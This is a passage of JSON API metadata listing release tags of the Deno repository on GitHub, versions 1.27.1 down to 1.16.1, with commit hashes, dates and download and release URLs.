ependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno